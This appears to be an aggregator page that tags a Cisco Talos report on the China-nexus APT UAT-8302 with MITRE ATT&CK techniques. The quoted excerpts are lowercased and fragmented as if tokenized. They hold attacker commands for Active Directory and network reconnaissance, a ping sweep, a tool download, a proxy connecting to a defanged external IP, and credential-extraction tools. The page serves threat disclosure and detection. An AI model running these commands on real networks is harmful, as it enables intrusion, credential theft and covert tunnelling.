TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Cisco Talos Intelligence

UAT-8302 and its box full of malware

Jungsoo An · 1 day ago · Read original ↗

ATT&CK techniques detected

34 predictions
T1053.005Scheduled Task
100%
“- execute a. net plugin : this functionality is similar to its ability to run arbitrary. net based assemblies. here, the implant runs a provided plugin ’ s “ plugin. run ” function. since netdraft is missing the capability to persist across reboots and relogins, one of the first …”
T1087.002Domain Account
98%
“) - join ' ; ' } } powershell - command get - adcomputer - filter * - property name, dnshostname, operatingsystem, description | select - object name, dnshostname, operatingsystem, description | format - table - autosize powershell - command get - adgroup - filter * - properties …”
T1055.001Dynamic-link Library Injection
97%
“in a data file : yandex. exe - r - p : test. ini - s : 12 vmtools. exe - r - p : vm. ini - s : 12 the executables will sideload a dll named “ mspdb60 [. ] dll ”, which will load and decrypt the “. ini ” file specified in the command line — such as “ test. ini ” or “ vm. ini ”. th…”
T1588.002Tool
96%
“and its snowlight stager in their operations, along with a new rust - based stager that we track as snowrust. talos assesses with high confidence that uat - 8302 is a china - nexus advanced persistent threat ( apt ) group tasked primarily with obtaining and maintaining long - ter…”
T1090Proxy
94%
“- nexus threat actors. in parallel, uat - 8302 also deployed draculoader, a generic shellcode loader, also used by the earth estries and earth naga apt groups who have histories of targeting government agencies in southeast asia and elsewhere : c : \ documents and settings \ all …”
T1482Domain Trust Discovery
94%
“on the systems to identify them : whoami whoami. exe / groups whoami. exe / priv net. exe user net. exe localgroup net. exe localgroup administrators ipconfig. exe / all arp. exe - a route. exe print netstat. exe - ano cmd. exe / c net share cmd. exe / c wmic startup get caption,…”
T1587.001Malware
93%
“uat - 8302 and its box full of malware - cisco talos is disclosing uat - 8302, a sophisticated, china - nexus advanced persistent threat ( apt ) group targeting government entities in south america since at least late 2024 and government agencies in southeastern europe in 2025. -…”
T1654Log Enumeration
93%
“| format - list logname, filesize, logmode, maximumsizeinbytes, recordcount powershell - command get - eventlog - logname system - source netlogon - newest 5000 | where - object { $ _. message - match " administrator " } powershell - command chcp 437 > $ null ; get - winevent - f…”
T1588.001Malware
88%
“also disclosed by eset as nosydoor, attributed to a china - nexus apt they track as longnosedgoblin. eset assesses that longnosedgoblin used nosydoor / netdraft and other custom - made malware to target government organizations in southeast asia and japan. furthermore, as per sol…”
T1055.001Dynamic-link Library Injection
83%
“##33 - 0 - win. loader. cloudsorcerer - 10059634 - 0 - win. malware. cloudsorcerer - 10059635 - 0 - win. tool. dddd - 10059636 - 2 - win. tool. dddd - 10059637 - 0 - win. loader. donut - 10059638 - 0 - win. loader. draculoader - 10059639 - 0 - win. tool. gogo - 10059640 - 0 - win…”
T1105Ingress Tool Transfer
82%
“a stager for the vshell malware that downloads and single - byte xors the obtained payload with the key 0x99. the decoded payload is a garbled version of vshell. it is worth noting that talos observed the same single byte key and stager being used by uat - 6382 to deliver vshell …”
T1190Exploit Public-Facing Application
81%
“- 8302 in conjunction with each other, a tactic also highlighted by trend micro in 2024. talos ’ analysis also connects more custom - made tooling that uat - 8302 used to other china - nexus or chinese - speaking apts : - draculoader : a generic shellcode loader deployed by uat -…”
T1055.001Dynamic-link Library Injection
78%
“##ject itself into explorer. exe, and receive command codes from the c2 via a named pipe, gather disk information, enumerate files, execute arbitrary commands, perform file operations ( delete, rename, read, write, etc. ) and execute shellcode received via the named pipe. - if th…”
T1003.001LSASS Memory
71%
“\ windows \ temp \ result. dat uat - 8302 also uses a tool written in simplified chinese called “ sharpgetuserloginiprp ” — derived from another chinese - language repository — which is used to extract login information from a domain controller : c : \ programdata \ s. exe user :…”
T1055.001Dynamic-link Library Injection
70%
“benign executable is used to side load a malicious dynamic - link library ( dll ) based loader. - the loader dll decodes netdraft from an accompanying data file and invokes it in the context of the existing process. - netdraft also contains an embedded,. net - based helper librar…”
T1046Network Service Discovery
68%
“i in ( 1, 1, 254 ) do @ ping - n 1 - w 300 192. 168. 1. % i | find ttl = & & echo 192. 168. 1. % i is alive ) > c : \ windows \ temp \ alive _ hosts. txt uat - 8302 also discovers smb shares in the network to find reachable remote shares : cmd. exe / q / c ( for / l % i in ( 1, 1…”
T1071Application Layer Protocol
64%
“actors set up. the data blob is decoded to obtain the c2 information, which can exist in the one of the following formats depending on the variant of the cloudsorcerer backdoor : - a c2 url for a domain or ip, controlled by uat - 8302, that the malware uses to begin communication…”
T1059.001PowerShell
63%
“##02 ' s primary goals is to proliferate within the compromised network, and therefore, the actor conducts extensive reconnaissance on every endpoint that they can access. this extended recon is scripted usually using a custom - made powershell script such as “ whatpc. ps1 ” : po…”
T1071.001Web Protocols
58%
“##ware. agent - 10059662 - 0 the following snort rules ( sids ) detect and block this threat : - 66055, 66054, 301437, 301436, 301435, 301434, 301433, 301432, 301431 - 66052, 66053, 66050, 66051, 66048, 66049, 66046, 66047, 66044, 66045, 66042, 66043, 66040, 66041 indicators of c…”
T1105Ingress Tool Transfer
58%
“shellcode and executes it to download the xor encoded final payload, vshell, received from the c2. in one intrusion, uat - 8302 used vshell to deploy a native driver from the hades hids / hips software — an open - source windows host monitoring kernel framework written in simplif…”
T1018Remote System Discovery
55%
“/ / github [. ] com / chainreactors / gogo / releases / download / v2. 14. 0 / gogo _ windows _ amd64. exe - o go. exe additionally, uat - 8302 uses a variety of scanning tools such as qscan, naabu and dddd portqry and httpx to discover services in the network : httpx. exe - sc -…”
T1587.001Malware
55%
“also disclosed by eset as nosydoor, attributed to a china - nexus apt they track as longnosedgoblin. eset assesses that longnosedgoblin used nosydoor / netdraft and other custom - made malware to target government organizations in southeast asia and japan. furthermore, as per sol…”
T1572Protocol Tunneling
52%
“8302 may also extract login credentials from mobaxxterm, a multi - functional and tabbed ssh client, using tools such as mobaxtermdecryptor to pivot to other endpoints. custom - made malware deployment uat - 8302 deploys a variety of malware families in their intrusions including…”
T1090.001Internal Proxy
45%
“[. ] 3 : 56456 - s < pass > & & echo exit ) > c : \ windows \ temp \ trun. bat ag531. exe - c 45 [. ] 135 [. ] 135 [. ] 100 : 443 - s < blah > - f agreeduponbyallparties uat - 8302 may use other tools such as anyproxy to set up proxies within the infected enterprise ’ s network :…”
T1071Application Layer Protocol
43%
“8302 may also extract login credentials from mobaxxterm, a multi - functional and tabbed ssh client, using tools such as mobaxtermdecryptor to pivot to other endpoints. custom - made malware deployment uat - 8302 deploys a variety of malware families in their intrusions including…”
T1055.001Dynamic-link Library Injection
40%
“shellcode and executes it to download the xor encoded final payload, vshell, received from the c2. in one intrusion, uat - 8302 used vshell to deploy a native driver from the hades hids / hips software — an open - source windows host monitoring kernel framework written in simplif…”
T1543.003Windows Service
37%
“shellcode and executes it to download the xor encoded final payload, vshell, received from the c2. in one intrusion, uat - 8302 used vshell to deploy a native driver from the hades hids / hips software — an open - source windows host monitoring kernel framework written in simplif…”
T1053.005Scheduled Task
37%
“##02 ' s primary goals is to proliferate within the compromised network, and therefore, the actor conducts extensive reconnaissance on every endpoint that they can access. this extended recon is scripted usually using a custom - made powershell script such as “ whatpc. ps1 ” : po…”
T1059.003Windows Command Shell
35%
“\ windows \ temp \ result. dat uat - 8302 also uses a tool written in simplified chinese called “ sharpgetuserloginiprp ” — derived from another chinese - language repository — which is used to extract login information from a domain controller : c : \ programdata \ s. exe user :…”
T1055.001Dynamic-link Library Injection
33%
“##647 - 0 - win. malware. snappybee - 10059648 - 0 - win. malware. snappybee - 10059649 - 0 - win. malware. snappybee - 10059650 - 0 - win. malware. snappybee - 10059651 - 0 - win. malware. snappybee - 10059652 - 0 - win. malware. snappybee - 10059653 - 0 - win. malware. snowrust…”
T1552.005Cloud Instance Metadata API
33%
“for azure ad connect / entra id connect credential extraction : python. exe adconnectdump. py manual extraction uat - 8302 may also directly query the ad user and computer objects to obtain information from them via powershell : powershell - command get - aduser - filter * - prop…”
T1068Exploitation for Privilege Escalation
33%
“shellcode and executes it to download the xor encoded final payload, vshell, received from the c2. in one intrusion, uat - 8302 used vshell to deploy a native driver from the hades hids / hips software — an open - source windows host monitoring kernel framework written in simplif…”
T1055.001Dynamic-link Library Injection
32%
“actors set up. the data blob is decoded to obtain the c2 information, which can exist in the one of the following formats depending on the variant of the cloudsorcerer backdoor : - a c2 url for a domain or ip, controlled by uat - 8302, that the malware uses to begin communication…”
T1587Develop Capabilities
32%
“uat - 8302 and its box full of malware - cisco talos is disclosing uat - 8302, a sophisticated, china - nexus advanced persistent threat ( apt ) group targeting government entities in south america since at least late 2024 and government agencies in southeastern europe in 2025. -…”

Summary

Cisco Talos is disclosing UAT-8302, a sophisticated, China-nexus advanced persistent threat (APT) group targeting government entities in South America since at least late 2024 and government agencies in southeastern Europe in 2025.